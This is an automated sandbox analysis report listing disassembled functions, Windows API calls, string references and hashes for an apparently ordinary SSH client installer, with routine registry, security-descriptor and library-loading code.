                                                                                                                                  • Opcode ID: d20ba85b78abce5fe82bf71f7e5fdcae56ae7ca970d13f65e9b0d6ed9ceb6193
                                                                                                                                  • Instruction ID: b33799243aa951fb296ff16d1c43754934ff910a7e50a563927e746f269ca64d
                                                                                                                                  • Opcode Fuzzy Hash: d20ba85b78abce5fe82bf71f7e5fdcae56ae7ca970d13f65e9b0d6ed9ceb6193
                                                                                                                                  • Instruction Fuzzy Hash: D7514D75544345FEC608FB61E866F5EB7E8BF14F18F404C7DF089A3191EB71A9048A1A
                                                                                                                                  APIs
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5BA29
                                                                                                                                  • FoldStringW.KERNEL32(000000B0,?,00000000,?,?,00000000), ref: 00E5BA5D
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E5BA6B
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5BA99
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5BAFC
                                                                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00E5BB3F
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E5BB4B
                                                                                                                                    • Part of subcall function 00E44630: IsDebuggerPresent.KERNEL32(460C02D8,0131B928,?,?), ref: 00E4465E
                                                                                                                                    • Part of subcall function 00E44630: DebugBreak.KERNEL32 ref: 00E44668
                                                                                                                                    • Part of subcall function 00E44630: GetModuleFileNameA.KERNEL32(00000000,?,0000012B), ref: 00E446D2
                                                                                                                                    • Part of subcall function 00E44630: Concurrency::cancel_current_task.LIBCPMT ref: 00E44742
                                                                                                                                    • Part of subcall function 00E44630: GetCurrentProcessId.KERNEL32(00000000,?,, PID ,00000006,9.39,00000004,', version ,?,00000000,Ensure check failed in module ',0000001F,-000000C7), ref: 00E447C5
                                                                                                                                    • Part of subcall function 00E44630: GetCurrentThreadId.KERNEL32 ref: 00E44809
                                                                                                                                  Strings
                                                                                                                                  • !af_, xrefs: 00E5BBDD
                                                                                                                                  • datavect<wchar_t>::size, xrefs: 00E5BBD8
                                                                                                                                  • value <= (InType) std::numeric_limits<OutType>::max(), xrefs: 00E5BA44
                                                                                                                                  • NormalizePassphrase: FoldString, xrefs: 00E5BA78
                                                                                                                                  • value >= 0, xrefs: 00E5BBC9
                                                                                                                                  • NormalizePassphrase: folded buffer too large, xrefs: 00E5BA00
                                                                                                                                  • NumCast, xrefs: 00E5BA3F, 00E5BBC4
                                                                                                                                  • NormalizePassphrase: UTF-8 buffer too large, xrefs: 00E5BAD3
                                                                                                                                  • NormalizePassphrase: WideCharToMultiByte, xrefs: 00E5BB59
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Exception@8Throw$CurrentErrorLast$BreakByteCharConcurrency::cancel_current_taskDebugDebuggerFileFoldModuleMultiNamePresentProcessStringThreadWide
                                                                                                                                  • String ID: !af_$NormalizePassphrase: FoldString$NormalizePassphrase: UTF-8 buffer too large$NormalizePassphrase: WideCharToMultiByte$NormalizePassphrase: folded buffer too large$NumCast$datavect<wchar_t>::size$value <= (InType) std::numeric_limits<OutType>::max()$value >= 0
                                                                                                                                  • API String ID: 1701598438-1489170544
                                                                                                                                  • Opcode ID: a28846a8a78e3bc63fa6c4611c846d8c56ea09eec11a20327aff55a5da7fe5b3
                                                                                                                                  • Instruction ID: 2a3527d44f6ce37789b74d29bb39b9289e5503bbe493798cde742e3cc2a4091e
                                                                                                                                  • Opcode Fuzzy Hash: a28846a8a78e3bc63fa6c4611c846d8c56ea09eec11a20327aff55a5da7fe5b3
                                                                                                                                  • Instruction Fuzzy Hash: 2981D170A00348EFDB14EBA5DD46BAEBBF4AF04704F104558F915BB2D1DBB06A08CB92
                                                                                                                                  APIs
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E84F3A
                                                                                                                                    • Part of subcall function 0111AB60: RaiseException.KERNEL32(?,?,?,00E3A2DC,0131B928,0131B928,?,?,?,?,?,?,00E3A2DC,0131B928,01302F74,0131B928), ref: 0111ABBF
                                                                                                                                  • GetSysColor.USER32(00000008), ref: 00E8501A
                                                                                                                                  • GetSysColor.USER32(00000008), ref: 00E850C7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Color$ExceptionException@8RaiseThrow
                                                                                                                                  • String ID: An $Invalid type$Optional$Recommended$\red0\green160\blue0$\red10\green255\blue10$\red240\green0\blue0$\red240\green90\blue0$\red255\green20\blue20$\red255\green255\blue0$an $optional$recommended
                                                                                                                                  • API String ID: 3502205127-1911849566
                                                                                                                                  • Opcode ID: 446354bfa2803d1b3a25add16f4dce97ac19e7203103be0d2c367f68160988f4
                                                                                                                                  • Instruction ID: 2a1d31c2f3124b5cdf4d141c3a43d88edf33a69fe03a964141956cc0faffe38e
                                                                                                                                  • Opcode Fuzzy Hash: 446354bfa2803d1b3a25add16f4dce97ac19e7203103be0d2c367f68160988f4
                                                                                                                                  • Instruction Fuzzy Hash: 6E71D472B14A49ABDB21EF68D805BAEBBE4FB44718F04514EE40CB72C1DBB99904C7D1
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32 ref: 00E61377
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E613F8
                                                                                                                                    • Part of subcall function 00E5F2A0: EnterCriticalSection.KERNEL32(0131B8F8,?), ref: 00E5F35B
                                                                                                                                    • Part of subcall function 00E5F2A0: LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E5F3F8
                                                                                                                                  • GetKeyState.USER32(00000010), ref: 00E61111
                                                                                                                                    • Part of subcall function 00E5F2A0: EnterCriticalSection.KERNEL32(0131B8F8,460C02D8,?,?), ref: 00E5F2DF
                                                                                                                                    • Part of subcall function 00E5F2A0: LeaveCriticalSection.KERNEL32(0131B8F8), ref: 00E5F410
                                                                                                                                  • LeaveCriticalSection.KERNEL32(0131B99C), ref: 00E619D9
                                                                                                                                  Strings
                                                                                                                                  • !af_, xrefs: 00E6188F, 00E618A3, 00E618B7
                                                                                                                                  • ncvector<struct SshClient::Console::OutParam>::begin, xrefs: 00E6188A
                                                                                                                                  • datavect<struct SshClient::Console::OutParam *>::size, xrefs: 00E6189E
                                                                                                                                  • BvConsole: Invalid completion action, xrefs: 00E618C3
                                                                                                                                  • ncvector<struct SshClient::Console::OutParam>::operator [], xrefs: 00E618B2
                                                                                                                                  • datavect<struct SshClient::Console::OutParam *>::at, xrefs: 00E61876
                                                                                                                                  • , xrefs: 00E61901
                                                                                                                                  • !af_ && i<s_, xrefs: 00E6187B
                                                                                                                                  • (, xrefs: 00E61454
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$Leave$Enter$State
                                                                                                                                  • String ID: $!af_$!af_ && i<s_$($BvConsole: Invalid completion action$datavect<struct SshClient::Console::OutParam *>::at$datavect<struct SshClient::Console::OutParam *>::size$ncvector<struct SshClient::Console::OutParam>::begin$ncvector<struct SshClient::Console::OutParam>::operator []
                                                                                                                                  • API String ID: 2483608690-741076853
                                                                                                                                  • Opcode ID: 4652cd12725b9d11375caedbd1d5303ec66a704406df08e5d3f98394c597243b
                                                                                                                                  • Instruction ID: f1919f45096fd07637a9f5a43488d1baca15be7195d6215b660f14776d246fac
                                                                                                                                  • Opcode Fuzzy Hash: 4652cd12725b9d11375caedbd1d5303ec66a704406df08e5d3f98394c597243b
                                                                                                                                  • Instruction Fuzzy Hash: 78F10670E40248DEDF29DFA4D895BEEBBF4AF15344F18509CE411B7282DB709A49CB61
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ($($)$)$-$-$/$/$7$7$8$8$RefPtrConst<class VersionInfo>::GetRef$m_ptr != nullptr
                                                                                                                                  • API String ID: 0-2960953702
                                                                                                                                  • Opcode ID: 8a37ee2cb7ee7c4dfd3f52b8f698c44efd2b1cac147a67228e25c7c5da02470c
                                                                                                                                  • Instruction ID: 8f625bf4645aafc61afbee719c8be80aa06e79bd803993be4adb63bd794be324
                                                                                                                                  • Opcode Fuzzy Hash: 8a37ee2cb7ee7c4dfd3f52b8f698c44efd2b1cac147a67228e25c7c5da02470c
                                                                                                                                  • Instruction Fuzzy Hash: D0C17BB0900258AFDB25EF94C944B9EBBB8FF04708F504159E41DBB281DB75AA18CFA1
                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(00000107,?,?,460C02D8,00000000,00000000,00000038), ref: 00E5DDDC
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E5DDEE
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5DE1D
                                                                                                                                  • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00E5DE53
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E5DE64
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5DE93
                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,?,00000000,01068492,460C02D8,00000000,00000000,00000038), ref: 00E5DF44
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E5DF66
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5DF95
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$Exception@8Throw$DirectoryLibraryLoadSystem
                                                                                                                                  • String ID: !m_hDll$DllLoader::Init$GetSystemDirectory()$GetSystemWow64Directory()$LoadLibraryEx()
                                                                                                                                  • API String ID: 2172637159-1744778925
                                                                                                                                  • Opcode ID: cea775fe15b5c678427740e8a2a9f3d3e1ef2b5390c90aef4b115a57c4ea441f
                                                                                                                                  • Instruction ID: 0c1ab309c50967174d1740ddaa52b615a04a66082ebedbc2634549ea10d7f4c3
                                                                                                                                  • Opcode Fuzzy Hash: cea775fe15b5c678427740e8a2a9f3d3e1ef2b5390c90aef4b115a57c4ea441f
                                                                                                                                  • Instruction Fuzzy Hash: A381B171E04209ABDF28EFA4DC46BEEB7B8EF14305F004569E911B7280DBB55948CBA0
                                                                                                                                  APIs
                                                                                                                                  • GetModuleFileNameW.KERNEL32(T6,?,?,00000105,?,460C02D8,00000001,?,?), ref: 00E52241
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E5230D
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5233C
                                                                                                                                  • GetUserProfileDirectoryW.USERENV(?,00000000,?,460C02D8,?,?), ref: 00E52396
                                                                                                                                  • GetLastError.KERNEL32(?,00000000,?,460C02D8,?,?), ref: 00E523A0
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E523D6
                                                                                                                                  • GetUserProfileDirectoryW.USERENV(?,00000000,00000000,00000000,?,00000000,?,460C02D8,?,?), ref: 00E5241C
                                                                                                                                  • GetLastError.KERNEL32(00000001,?,00000000,00000000,00000000,?,00000000,?,460C02D8,?,?), ref: 00E52428
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$DirectoryException@8ProfileThrowUser$FileModuleName
                                                                                                                                  • String ID: !af_$GetModuleFileName()$GetUserProfileDirectoryW(first)$GetUserProfileDirectoryW(second)$T6$datavect<wchar_t>::size
                                                                                                                                  • API String ID: 258523341-4036657018
                                                                                                                                  • Opcode ID: d2d6bb96a5c450bb5e39c0aa5268480378ec79fa45bc08cb08d028c550cc8622
                                                                                                                                  • Instruction ID: 85d9fcffc2ba28bec8ef340dc89071da598cad7baa20fb18931f8c8fdfbdff1b
                                                                                                                                  • Opcode Fuzzy Hash: d2d6bb96a5c450bb5e39c0aa5268480378ec79fa45bc08cb08d028c550cc8622
                                                                                                                                  • Instruction Fuzzy Hash: 9871C171A00209ABDB24DFA5CC45BEEBBF8EF05704F00446DE915F7280D7B5A908CBA1
                                                                                                                                  APIs
                                                                                                                                  • GetSidLengthRequired.ADVAPI32(?,460C02D8,?), ref: 00E5A189
                                                                                                                                  • InitializeSid.ADVAPI32(00000001,?,?,00000000,?,?), ref: 00E5A1DB
                                                                                                                                  • GetSidSubAuthority.ADVAPI32(00000001,00000000), ref: 00E5A202
                                                                                                                                  • GetSidSubAuthority.ADVAPI32(00000001,00000001), ref: 00E5A233
                                                                                                                                  • GetSidSubAuthority.ADVAPI32(00000001,00000002), ref: 00E5A264
                                                                                                                                  • GetSidSubAuthority.ADVAPI32(00000001,00000003), ref: 00E5A296
                                                                                                                                  • GetSidSubAuthority.ADVAPI32(00000001,00000004), ref: 00E5A2C8
                                                                                                                                  • GetSidSubAuthority.ADVAPI32(00000001,00000005), ref: 00E5A2FA
                                                                                                                                  • GetSidSubAuthority.ADVAPI32(00000001,00000006), ref: 00E5A32C
                                                                                                                                  • GetSidSubAuthority.ADVAPI32(00000001,00000007), ref: 00E5A35E
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5A3DA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Authority$Exception@8InitializeLengthRequiredThrow
                                                                                                                                  • String ID: !af_$Sid::Set() - invalid subauthority count ($datavect<unsigned char>::begin
                                                                                                                                  • API String ID: 2891347615-1191388841
                                                                                                                                  • Opcode ID: 78d922905a1da279f22b1f433db9a1d8bf7f80a6bdb709ae260d37b353212795
                                                                                                                                  • Instruction ID: 868589c2389d268252de34adcd0904e5e9bab0756e89ef312d04d402e5f545f7
                                                                                                                                  • Opcode Fuzzy Hash: 78d922905a1da279f22b1f433db9a1d8bf7f80a6bdb709ae260d37b353212795
                                                                                                                                  • Instruction Fuzzy Hash: 1061E371A90304EBDB399F20EC4BF4D7BE6AB11B05F14442CF905762E5E7B11948CB62
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00E6D2C0: GetCurrentProcess.KERNEL32(?,?,?,?,00000000), ref: 00E6D3DB
                                                                                                                                  • RegDeleteValueW.ADVAPI32(?,00000000,?,00000000,?,00000002,00000000,00000000,?,?,460C02D8), ref: 00E6F98B
                                                                                                                                  • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00E6FA69
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6FAB6
                                                                                                                                  • RegEnumValueW.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00000000), ref: 00E6FB78
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E6FCAA
                                                                                                                                    • Part of subcall function 00E44630: IsDebuggerPresent.KERNEL32(460C02D8,0131B928,?,?), ref: 00E4465E
                                                                                                                                    • Part of subcall function 00E44630: DebugBreak.KERNEL32 ref: 00E44668
                                                                                                                                    • Part of subcall function 00E44630: GetModuleFileNameA.KERNEL32(00000000,?,0000012B), ref: 00E446D2
                                                                                                                                    • Part of subcall function 00E44630: Concurrency::cancel_current_task.LIBCPMT ref: 00E44742
                                                                                                                                    • Part of subcall function 00E44630: GetCurrentProcessId.KERNEL32(00000000,?,, PID ,00000006,9.39,00000004,', version ,?,00000000,Ensure check failed in module ',0000001F,-000000C7), ref: 00E447C5
                                                                                                                                    • Part of subcall function 00E44630: GetCurrentThreadId.KERNEL32 ref: 00E44809
                                                                                                                                    • Part of subcall function 00E6CE60: RegCloseKey.ADVAPI32(012A03EC,460C02D8,?), ref: 00E6CEA1
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Current$Exception@8ProcessThrowValue$BreakCloseConcurrency::cancel_current_taskDebugDebuggerDeleteEnumFileInfoModuleNamePresentQueryThread
                                                                                                                                  • String ID: !af_$NumCast$RegDeleteValueW()$RegEnumValueW()$RegQueryInfoKeyW()$datavect<struct WWLib::RegItem *>::size$ncvector<struct WWLib::RegItem>::reserve$value >= 0
                                                                                                                                  • API String ID: 1777080608-3490134241
                                                                                                                                  • Opcode ID: 8466a22cc23080f57d6507c2a94a1801c389faf59d71f83ea754640215567cc2
                                                                                                                                  • Instruction ID: 26344f8f2c7dd8e1b07c126c81d5d9a614a91906df48c67977bf72259ed5b423
                                                                                                                                  • Opcode Fuzzy Hash: 8466a22cc23080f57d6507c2a94a1801c389faf59d71f83ea754640215567cc2
                                                                                                                                  • Instruction Fuzzy Hash: C4D1AFB0A40248EFDF14DFA4E955BAEBBF8FF04748F144069E915BB281D775AA04CB90
                                                                                                                                  Strings
                                                                                                                                  • datavect<unsigned int>::size, xrefs: 00F11727
                                                                                                                                  • Oid::FromStr() - value too large, xrefs: 00F11575
                                                                                                                                  • !af_, xrefs: 00F1172C
                                                                                                                                  • Oid::FromStr() - invalid character, expecting '.', xrefs: 00F11537
                                                                                                                                  • datavect<unsigned int>::operator [], xrefs: 00F11762
                                                                                                                                  • ..., xrefs: 00F11736
                                                                                                                                  • !af_ && i<s_, xrefs: 00F11767
                                                                                                                                  • Oid::FromStr() - invalid character, expecting a decimal digit, xrefs: 00F115AD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: !af_$!af_ && i<s_$...$Oid::FromStr() - invalid character, expecting '.'$Oid::FromStr() - invalid character, expecting a decimal digit$Oid::FromStr() - value too large$datavect<unsigned int>::operator []$datavect<unsigned int>::size
                                                                                                                                  • API String ID: 0-669650995
                                                                                                                                  • Opcode ID: 6a5ff065f91e0450632c195c277ee1f3b7f9c1917e4f0466d51a8c1b4e03a207
                                                                                                                                  • Instruction ID: cabad9e75d3accbf1ccfd3a02fe13e2f8185d9e46aa855594d9e180a19fb8d72
                                                                                                                                  • Opcode Fuzzy Hash: 6a5ff065f91e0450632c195c277ee1f3b7f9c1917e4f0466d51a8c1b4e03a207
                                                                                                                                  • Instruction Fuzzy Hash: 95C1E271E002099BDF18DFA5C855BEEB7B8FF55724F14422CE522A72C0EB71AA44CB91
                                                                                                                                  APIs
                                                                                                                                  • InterlockedCompareExchange.KERNEL32(0131AB84,00000001,00000000), ref: 00E450CE
                                                                                                                                  • SwitchToThread.KERNEL32(?,460C02D8,?,0111BC80,012C04F8,000000FE,?,00E3A8D6,460C02D8), ref: 00E450F2
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,460C02D8,?,0111BC80,012C04F8,000000FE,?,00E3A8D6,460C02D8), ref: 00E4512C
                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000006,00E44D40,0111BC80,?,460C02D8,?,0111BC80,012C04F8,000000FE,?,00E3A8D6,460C02D8), ref: 00E45140
                                                                                                                                  • GetModuleFileNameW.KERNEL32(0111BC80,0131AB88,0000012C,?,460C02D8,?,0111BC80,012C04F8,000000FE,?,00E3A8D6,460C02D8), ref: 00E4515B
                                                                                                                                  • GetFileAttributesW.KERNEL32(0131AB88,?,460C02D8,?,0111BC80,012C04F8,000000FE,?,00E3A8D6,460C02D8), ref: 00E451BD
                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,460C02D8,?,0111BC80,012C04F8,000000FE,?,00E3A8D6,460C02D8), ref: 00E451DC
                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,460C02D8,?,0111BC80,012C04F8,000000FE,?,00E3A8D6,460C02D8), ref: 00E451F7
                                                                                                                                  • CreateMutexW.KERNEL32(00000000,00000000,00000000,?,460C02D8,?,0111BC80,012C04F8,000000FE,?,00E3A8D6,460C02D8), ref: 00E4520C
                                                                                                                                  • CreateThread.KERNEL32(00000000,00010000,00E44D40,00000000,00010000,?), ref: 00E45232
                                                                                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 00E45250
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Create$EventFileHandleModuleThread$AttributesCallCloseCompareExchangeFilterFunc@8InterlockedMutexNameSwitch
                                                                                                                                  • String ID: BvDump32.exe
                                                                                                                                  • API String ID: 2090855902-3057195707
                                                                                                                                  • Opcode ID: a126b02e97cf0d74787231af62d75569a494f3cadb03c76ea36f7b9a0f0a12e2
                                                                                                                                  • Instruction ID: 23e116691e1106140157e8851e56a466088b3344039c3272e9e52a7b47befa14
                                                                                                                                  • Opcode Fuzzy Hash: a126b02e97cf0d74787231af62d75569a494f3cadb03c76ea36f7b9a0f0a12e2
                                                                                                                                  • Instruction Fuzzy Hash: 9B510532684B45ABEB259F68BC45BAE77B8F744725F14012BF912F72C1D7B1A400CB54
                                                                                                                                  APIs
                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000014), ref: 00E5A731
                                                                                                                                  • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00E5A740
                                                                                                                                  • GetLastError.KERNEL32(00000001), ref: 00E5A752
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5A77D
                                                                                                                                  • GetLastError.KERNEL32(?,01303710,SecurityDescriptor: LocalAlloc()), ref: 00E5A782
                                                                                                                                  • LocalFree.KERNEL32 ref: 00E5A78C
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5A7B9
                                                                                                                                  • SetSecurityDescriptorOwner.ADVAPI32(?,?,00000001), ref: 00E5A7D0
                                                                                                                                  • GetLastError.KERNEL32(00000001,?,?,00000001), ref: 00E5A7E2
                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00E5A80D
                                                                                                                                  Strings
                                                                                                                                  • SecurityDescriptor: LocalAlloc(), xrefs: 00E5A760
                                                                                                                                  • SetSecurityDescriptorOwner(), xrefs: 00E5A7F0
                                                                                                                                  • InitializeSecurityDescriptor(), xrefs: 00E5A79C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorException@8LastThrow$DescriptorLocalSecurity$AllocFreeInitializeOwner
                                                                                                                                  • String ID: InitializeSecurityDescriptor()$SecurityDescriptor: LocalAlloc()$SetSecurityDescriptorOwner()
                                                                                                                                  • API String ID: 921255989-1898077872
                                                                                                                                  • Opcode ID: 6a7b1600e9da99ce6cd42cbcc1a8526d292f2aa293527a992008d1534d3e7862
                                                                                                                                  • Instruction ID: 5d0816d798ecdacdd254a9ce564d64d46dbf083ddf434bdf08755c8695eb3ffe
                                                                                                                                  • Opcode Fuzzy Hash: 6a7b1600e9da99ce6cd42cbcc1a8526d292f2aa293527a992008d1534d3e7862
                                                                                                                                  • Instruction Fuzzy Hash: B7210D316503057BC624BA759C4BF5A3BACAF44756F000938FE14E61C4EFB1A40CC7A6
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00F03C72
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,AcquireSRWLockShared), ref: 00F03C80
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 00F03C91
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockShared), ref: 00F03CA2
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 00F03CB3
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 00F03CC4
                                                                                                                                    • Part of subcall function 00E4DE80: VerSetConditionMask.KERNEL32 ref: 00E4DEE3
                                                                                                                                    • Part of subcall function 00E4DE80: VerSetConditionMask.KERNEL32(00000000), ref: 00E4DEEB
                                                                                                                                    • Part of subcall function 00E4DE80: VerSetConditionMask.KERNEL32(00000000), ref: 00E4DEF3
                                                                                                                                  • InitializeCriticalSection.KERNEL32(0131C07C), ref: 00F03D05
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$ConditionMask$CriticalHandleInitializeModuleSection
                                                                                                                                  • String ID: AcquireSRWLockExclusive$AcquireSRWLockShared$InitializeSRWLock$ReleaseSRWLockExclusive$ReleaseSRWLockShared$kernel32.dll
                                                                                                                                  • API String ID: 410524075-2154951675
                                                                                                                                  • Opcode ID: 8ba7a023f9ae54432c4006fa593876ef681096ee5daafdb9684c17520c5c2342
                                                                                                                                  • Instruction ID: 582233628f62bb8a488c671ee1c731dca0d0f0b9a8ef1cf282ecfab74bf3bf9b
                                                                                                                                  • Opcode Fuzzy Hash: 8ba7a023f9ae54432c4006fa593876ef681096ee5daafdb9684c17520c5c2342
                                                                                                                                  • Instruction Fuzzy Hash: 612135B5E11214AFC724DF68A849A5EBFFCAF58720F00417AF405D3248DB741948CBD0
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 01079C14
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,AcquireSRWLockShared), ref: 01079C22
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,AcquireSRWLockExclusive), ref: 01079C33
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockShared), ref: 01079C44
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ReleaseSRWLockExclusive), ref: 01079C55
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,InitializeSRWLock), ref: 01079C66
                                                                                                                                  • InitializeCriticalSection.KERNEL32(?), ref: 01079C82
                                                                                                                                    • Part of subcall function 00E4DE80: VerSetConditionMask.KERNEL32 ref: 00E4DEE3
                                                                                                                                    • Part of subcall function 00E4DE80: VerSetConditionMask.KERNEL32(00000000), ref: 00E4DEEB
                                                                                                                                    • Part of subcall function 00E4DE80: VerSetConditionMask.KERNEL32(00000000), ref: 00E4DEF3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2072629618.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_e30000_Set-up.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$ConditionMask$CriticalHandleInitializeModuleSection
                                                                                                                                  • String ID: AcquireSRWLockExclusive$AcquireSRWLockShared$InitializeSRWLock$ReleaseSRWLockExclusive$ReleaseSRWLockShared$kernel32.dll
                                                                                                                                  • API String ID: 410524075-2154951675
                                                                                                                                  • Opcode ID: cb8b5a4c7aa9b373ab35080af41894311a6404e5ca4cbc12f997231d31559d69
                                                                                                                                  • Instruction ID: a1387c1e7c53bd82354f6990e81e42f354b24222a66c7422dffdf364a42dcdfd
